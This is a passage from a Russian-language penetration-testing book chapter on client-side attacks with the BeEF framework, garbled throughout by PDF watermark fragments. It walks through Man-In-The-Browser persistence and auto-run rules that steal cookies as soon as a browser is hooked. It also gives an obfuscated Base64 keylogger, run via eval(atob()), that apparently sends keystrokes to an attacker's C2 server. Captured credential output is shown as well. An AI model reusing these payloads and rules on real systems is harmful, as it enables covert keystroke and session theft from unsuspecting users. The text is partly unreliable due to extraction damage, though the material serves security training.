Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
книги хакеры / Эдриан_Прутяну_Как_стать_хакером_сборник_практическиз_сценариев.pdf
Скачиваний:
18
Добавлен:
19.04.2024
Размер:
20.34 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

 

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

w Click

to

BUY 240  Глава 9.Практические атаки на стороне клиента

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

e

Если просмотрим содержимое файла keys.log, то увидим перехваченные

 

 

 

e

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

нажатия клавиш в виде открытого текста с помощью команды tail –f. root@spider-c2-1:~/keylogger# tail -f keys.log

[Tab]administrator[Tab][Shift]Winter2018[Enter][Shift]Hi[ ][Shift]

Jm[Backspace]im,[Enter][Enter][Shift]Please[ ]find[ ]attached[ ]the[ ] reports[ ]from[ ]last[ ]quarter.[Enter][Enter]

Нашкейлоггерэффективенидолжендовольнохорошоработатьвсовременных браузерах. Встроенный в BeEF журнал событий имеет несколько других полезных функций,таких как перехват щелчков мыши, события копирования и вставки, а также традиционные нажатия клавиш. Использование их в ходе атаки повысит наши шансы на получение полезных данных.

Закрепление в системе

BeEF обладает очень мощными возможностями, но он эффективен только до тех пор, пока страница открыта в браузере. Ранее мы говорили,что жертва, покидающая страницу, может прервать наш контроль над браузером. Такова печальная реальность XSS-атак. Постоянный XSS более устойчив, если пользовательдостаточно часто посещает зараженную страницу,но этот вариант не идеален.

BeEF поставляется с несколькими модулями, которые используются в попытке закрепить ловушку,дольше удерживая жертву в сети. Эффективный вариант– модуль Man-In-The-Browser,доступный в папке Persistence.

Рис.9.15. Модуль Man-In-The-Browser

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

BeEF  241 BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

e

Для него не надо ничего настраивать.Мы простодолжны его запустить,и он

 

 

e

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

обо всем позаботится сам.

Вид атаки «Человек в браузере» (MITB) аналогичен более популярному типу атаки «Человек посередине» (MITM). В случае с MITM компьютер жертвы обманом вынуждают направлять пакеты на компьютер злоумышленника, предоставляя ему полный контроль над сетевымтрафиком жертвы.Это может привести к таким последствиям, как понижение степени защиты соединения по протоколу TLS или отказ от его использования, нарушение целостности, внедрение вредоносных программ и многое другое. Атака MITB похожа тем, что веб-запросы проксируются и передаются с помощью вредоносного кода.

Например, модуль Man-In-The-Browser будет перехватывать клики по ссылкам, которые обычно отвлекают пользователя от перехваченной страницы. Вместо обычного завершения щелчка модуль будет выполнять следующие действия в фоновом режиме:

1.Выполнит асинхронный запрос JavaScript (XHR) к предполагаемому месту­ назначения.

2.Заменит содержимое существующей страницы содержимым страницы назначения.

3.Обновит адресную строку,чтобы отразить нажатую ссылку.

4.Добавит «старую» страницу в историю просмотров.

Можно увидетьатаку MITB вдействии,посмотрев историю выполнения модуля.

Рис.9.16. Результаты работы модуля Man-In-The-Browser

Для жертвы этот процесс прозрачен, поскольку запрошенная ею страница была успешно загружена и все выглядит нормально. Разница в том, что BeEF никогда не терял контроль над ловушкой, потому что сеанс из текущей вклад-

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

w Click

to

BUY 242  Глава 9.Практические атаки на стороне клиента

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

ки не был сброшен при уходе со страницы. Ловушка по-прежнему работает,

 

 

 

e

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

обеспечивая нам постоянный контроль.

Автоматическая эксплуатация

Всеэтимодуливеликолепны,ноXSS-атакиобычночувствительныковреме- ни. Если мы успешно обманули пользователя и заставили его запустить нашу ловушку, у нас может не хватить времени, чтобы кликнуть по пользовательскому интерфейсу и запустить какие-либо модули, прежде чем пользователь закроет страницу или перейдет к другой части приложения.

К счастью, в BeEF реализован компонент Autorun Rule Engine (ARE), который выполняет то, что вы, возможно, ожидали: он автоматически запускает модули,используя набор правил,определенных оператором.В зависимости от того, какие правила были включены, всякий раз, когда новый браузер заражается, выбранные модули выполняются автоматически.

Очевидные кандидаты в ARE – те, кто обеспечивает закрепление в системе и получение конфиденциальныхданных,например куки-файлы илидаже наш пользовательский кейлоггер.

Более подробную информацию об ARE можно найти на странице https://github.com/beefproject/beef/wiki/Autorun-Rule-Engine.

Правило ARE – это простой файл в формате JSON с метаданными, описывающими модуль, который должен быть выполнен. Он хранится в подкаталоге

arerules.

BeEF поставляется с несколькими примерами правил, которые позволяют запускать такие модули, как Get Cookie или Ping Sweep, но по умолчанию они выключены. Если мы хотим запустить их, как только жертва будет перехвачена, нужно поместить соответствующие JSON-файлы в подкаталог arerules/ enabled и перезапустить BeEF.

Правило Get Cookie выглядиттак:

root@spider-c2-1:~/beef# cat arerules/get_cookie.json

{

"name": "Get Cookie", "author": "@benichmt1", "browser": "ALL", "browser_version": "ALL", "os": "ALL", "os_version": "ALL", "modules": [

{"name": "get_cookie",

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

"condition": null, "options": {

}

}

BeEF 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

243 BUY

 

 

 

 

 

 

 

w Click

to

 

 

 

 

m

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

],

"execution_order": [0], "execution_delay": [0], "chain_mode": "sequential"

}

Здесь есть такие метаданные, как name и author. Правило ARE также может указывать любые связанные параметры, которые могут понадобиться для успешного выполнения. Мы можем определить порядок выполнения, а также добавитьзадержку.Режимы цепочки обозначаютметод,используемыйдля запуска модуля, но последовательность по умолчанию должна прекрасно работать при большинстве развертываний.

Более подробную информацию о режимах цепочки и написании правил ARE можно найти на странице https://github.com/

beefproject/beef/wiki/Autorun-Rule-Engine.

Внашем случае мы запускаем ловушку, используя отраженную XSS-атаку,

аэто означает, что как только пользователь уходит со страницы, мы можем навсегда потерять его. Вот где пригодится ARE. Мы автоматически запускаем модули Man-In-The-Browser и Get Cookie, как только жертва выходит в сеть, и надеемся, что сможем сохранить или, по крайней мере, получить куки-файлы сеанса, прежде чем она уйдет.

У Man-In-The-Browser и Get Cookie есть правила, уже доступные в BeEF.

Просто­ нужно включить их, поместив копию соответствующих файлов в фор-

мате JSON в подкаталог arerules/enabled.

root@spider-c2-1:~/beef# cp arerules/man_in_the_browser.json arerules/ enabled/man_in_the_browser.json

root@spider-c2-1:~/beef# cp arerules/get_cookie.json arerules/enabled/ get_cookie.json

ЧтобыARE загрузил вновьвключенные правила,нужно перезапуститьBeEF, если он уже запущен.

root@spider-c2-1:~/beef# ./beef [...]

[18:07:19][*] RESTful API key: cefce9633f9436202c1705908d508d31c7072374 [18:07:19][*] HTTP Proxy: http://127.0.0.1:6789

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

BUY 244  Глава 9.Практические атаки на стороне клиента

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

 

 

e

 

 

 

 

 

[18:07:19][*] [ARE] Ruleset (Perform Man-In-The-Browser) parsed and

 

 

 

 

 

n

 

 

 

 

 

 

 

-xcha

 

 

 

 

stored successfully.

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

[18:07:19][*] [ARE] Ruleset (Get Cookie) parsed and stored successfully.

[18:07:19][*] BeEF server started (press control+c to stop)

BeEF выполнит атаку MITB и извлечет куки-файлы приложения, как только жертвазайдетназараженнуюстраницу.МодульMan-In-The-Browserбудетпод- держиватьловушкуврабочемсостоянии,еслижертварешитщелкнутьмышью­ наприложении.МодульGetCookie,надеемся,добудеткукисессии,еслижертва решит закрыть браузер.

Как вы уже догадались, мы также можем автоматически запустить модуль Raw Javascript, который позволит выполнить произвольный код JavaScript, как только жертва выйдет в сеть. Хорошим кандидатом для этого является наш пользовательский кейлоггер.

Во-первых, нам нужно создать правило, которое будет инструктировать BeEF, как запускать модуль raw_javascript.

root@spider-c2-1:~/beef# cat arerules/enabled/raw_javascript.json

{

"name": "Raw JavaScript", "author": "wade@bindshell.net", "browser": "ALL", "browser_version": "ALL", "os": "ALL",

"os_version": "ALL", "modules": [

{"name": "raw_javascript", "condition": null, "options": {

"cmd": ""

}

}

],

"execution_order": [0], "execution_delay": [0], "chain_mode": "sequential"

}

Мы не хотим навязывать какие-либо условия для выполнения этого правила, но должны сказать о полезной нагрузке, которая будет выполнена. Модуль raw_javascript принимает одну опцию, cmd, представляющую собой необработанный код JavaScript.

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

BeEF  245 BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Теперь,поскольку правило находится в формате JSON,мы шифруем код на-

 

 

e

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

шего кейлоггера в Base64 и передаем его в декодер Base64, который, в свою очередь,будет выполняться функцией eval().Мы не обязаны делать этот шаг, но, чтобы сохранить код кейлоггера в файле JSON, нужно сжать его, используя минификаторJavaScriptиэкранируялюбыедвойныекавычкивкоде.Выглядит несколько сумбурно, поэтому пойдем по более простому пути.

Можно быстро закодировать кейлоггер, используя нечто наподобие Cyber­ Chef (или функцию JavaScript btoa()).

Рис.9.17. Кодирование пользовательского кода кейлоггера в CyberChef

Чтобы запустить код кейлоггера в кодировке Base64, нужно передать его в функцию atob(), прежде чем использовать метод eval() для фактического выполнения кода.

Ввод модуля Raw JavaScript будет выглядеть примерно так:

eval(atob(‘dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcGlkZXIubWwvbG9nLnBoc D9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVyID0gW107CmRvY3VtZW50LmFkZEV2ZW50TGlzdG VuZXIoImtleWRvd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsKICAgIGl mIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKSB7IGtleSA9ICJbIiArIGtleSAr ICJdIiB9CiAgICBidWZmZXIucHVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhb ChmdW5jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkgewogICAgICAgIHZ hciBkYXRhID0gZW5jb2RlVVJJQ29tcG9uZW50KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7 CgogICAgICAgIHZhciBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID0gcH VzaF91cmwgKyBkYXRhOwoKICAgICAgICBidWZmZXIgPSBbXTsKICAgIH0KfSwgMjAwM Ck7’));

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

 

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

w Click

to

BUY 246  Глава 9.Практические атаки на стороне клиента

w Click

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

e

ВконцеможемдобавитьэтозначениевJSON-файлправилаAREмодуляRaw

 

 

 

e

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

df

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

JavaScript. Этот модуль ожидает установки опции cmd, и именно сюда мы помещаем наш однострочный скрипт.

В окончательном виде правило будет выглядетьтак:

root@spider-c2-1:~/beef# cat arerules/enabled/raw_javascript.json

{

"name": "Raw JavaScript", "author": "wade@bindshell.net", "browser": "ALL", "browser_version": "ALL", "os": "ALL",

"os_version": "ALL", "modules": [

{"name": "raw_javascript", "condition": null, "options": {

"cmd": "eval(atob('dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcGlkZXIub

WwvbG9nLnBocD9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVyID0gW107CmRvY3VtZW50LmFkZEV2ZW

50TGlzdGVuZXIoImtleWRvd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsKICA

gIGlmIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKSB7IGtleSA9ICJbIiArIGtleSAr

ICJdIiB9CiAgICBidWZmZXIucHVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhbChmd

W5jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkgewogICAgICAgIHZhciBkYX

RhID0gZW5jb2RlVVJJQ29tcG9uZW50KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7CgogICAgICA

gIHZhciBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID0gcHVzaF91cmwgKyBk

YXRhOwoKICAgICAgICBidWZmZXIgPSBbXTsKICAgIH0KfSwgMjAwMCk7'));"

}

}

],

"execution_order": [0], "execution_delay": [0], "chain_mode": "sequential"

}

Каждый модуль требует своих специфических опций, чтобы функционировать правильно. BeEF – это программное обеспечение с открытым исходным кодом, поэтому мы можем проверить код, чтобы выяснить, что это за опции

(см. рис. 9 18).

После перезапуска BeEF загрузится наше новое правило ARE вместе с двумя другими стандартными правилами.

root@spider-c2-1:~/beef# ./beef [...]